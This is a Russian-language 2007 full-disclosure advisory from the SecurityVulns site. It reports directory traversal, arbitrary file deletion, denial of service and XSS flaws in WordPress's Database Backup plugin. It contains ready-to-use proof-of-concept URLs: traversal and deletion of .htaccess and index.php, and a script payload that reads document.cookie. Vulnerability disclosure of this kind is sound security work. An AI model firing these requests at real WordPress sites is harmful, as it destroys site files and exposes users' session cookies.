Информационная безопасность
[RU] switch to
English Version

  

Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  2z-project 0.9.6.1  Multiple Security Vulnerabilities

  [Full-disclosure] FAQMasterFlexPlus multiple vulnerabilities

  [Full-disclosure] OpenBiblio 0.5.2-pre4 and prior multiple vulnerabilities

  [HSC Security Group] Multiple CSRF in Joomla all versions - Complete compromise

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:28 декабря 2007 г.
Subject:Directory traversal, Arbitrary file deletion, DoS and XSS in WordPress

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Directory traversal, Arbitrary file deletion, Denial of Service и Cross-Site Scripting уязвимостях в WordPress. Дыры в файле wp-db-backup.php - в плагине WordPress Database Backup.

В прошлом году была найдена Directory traversal уязвимость в данном плагине (http://websecurity.com.ua/171/). Которая была исправлена в WP 2.0.4.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Как я выяснил данный плагин также уязвим к атаке с использованием обратного слеша (что работает только на Windows), о которой я писал ранее относительно другой дырки - Local file include и Directory traversal в WordPress (http://websecurity.com.ua/979/).

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..
\.htaccess

Эта дырка также уже была исправлена в WP 2.0.4. Поэтому уязвима WordPress 2.0.3 и предыдущие версии. Помимо Directory traversal, я также обнаружил другие уязвимости.

Также можно удалить произвольный файл на сервере (на который имеет права данный пользователь).

Arbitrary file deletion:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Только на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..
\.htaccess

Это также может быть использовано для проведения DoS-атаки. При удалении index.php сайт перестанет нормально функционировать.

DoS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php

Только на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..
\index.php

Уязвима WordPress 2.0.3 и предыдущие версии.

XSS:

http://site/wp-admin/edit.php?page=wp-db-backup.
php&backup=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x та 2.3.x).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1676/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru